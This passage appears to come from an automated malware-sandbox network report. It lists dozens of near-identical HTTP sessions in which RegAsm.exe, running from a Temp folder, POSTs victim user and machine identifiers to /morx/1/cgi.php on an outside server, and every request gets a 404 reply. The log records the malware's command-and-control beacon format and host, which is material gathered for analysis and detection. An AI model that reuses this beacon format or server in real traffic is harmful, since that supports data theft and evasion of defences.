                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        133192.168.2.2249300185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:59.313559055 CET1317OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:59.386737108 CET1317OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:59.474234104 CET1318INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:58 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        134192.168.2.2249301185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:59.687246084 CET1318OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:59.761672974 CET1318OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:59.847928047 CET1319INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:58 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        135192.168.2.2249302185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:00.058160067 CET1320OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:00.136981964 CET1320OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:00.228245974 CET1320INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:59 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        136192.168.2.2249303185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:00.450812101 CET1321OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:00.527220011 CET1321OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:00.618918896 CET1321INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:59 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        137192.168.2.2249304185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:00.828362942 CET1322OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:00.902213097 CET1322OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:00.993556023 CET1323INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:00 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        138192.168.2.2249305185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:01.210699081 CET1323OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:01.277134895 CET1324OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:01.363213062 CET1324INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:00 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        139192.168.2.2249306185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:01.575817108 CET1325OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:01.652148962 CET1325OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:01.750904083 CET1325INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:00 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        14192.168.2.2249181185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:12.832798958 CET1160OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:12.902548075 CET1160OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:12.987730980 CET1161INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:12 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        140192.168.2.2249307185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:01.975553036 CET1326OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:02.043100119 CET1326OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:02.132844925 CET1327INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:01 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        141192.168.2.2249308185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:02.334168911 CET1327OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:02.402632952 CET1328OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:02.488881111 CET1328INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:01 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        142192.168.2.2249309185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:02.695432901 CET1329OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:02.777380943 CET1329OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:02.863487959 CET1329INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:01 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        143192.168.2.2249310185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:03.081979036 CET1330OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:03.152472973 CET1330OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:03.240915060 CET1331INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:02 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        144192.168.2.2249311185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:03.437459946 CET1331OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:03.511662960 CET1332OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:03.601073027 CET1332INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:02 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        145192.168.2.2249312185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:03.817487001 CET1333OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:03.886569023 CET1333OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:03.979352951 CET1333INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:03 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        146192.168.2.2249313185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:04.190227032 CET1334OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:04.261697054 CET1334OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:04.351677895 CET1335INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:03 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        147192.168.2.2249314185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:04.554888964 CET1335OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:04.637051105 CET1336OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:04.731422901 CET1336INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:03 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        148192.168.2.2249315185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:04.946050882 CET1337OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:05.027569056 CET1337OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:05.124758005 CET1337INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:04 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
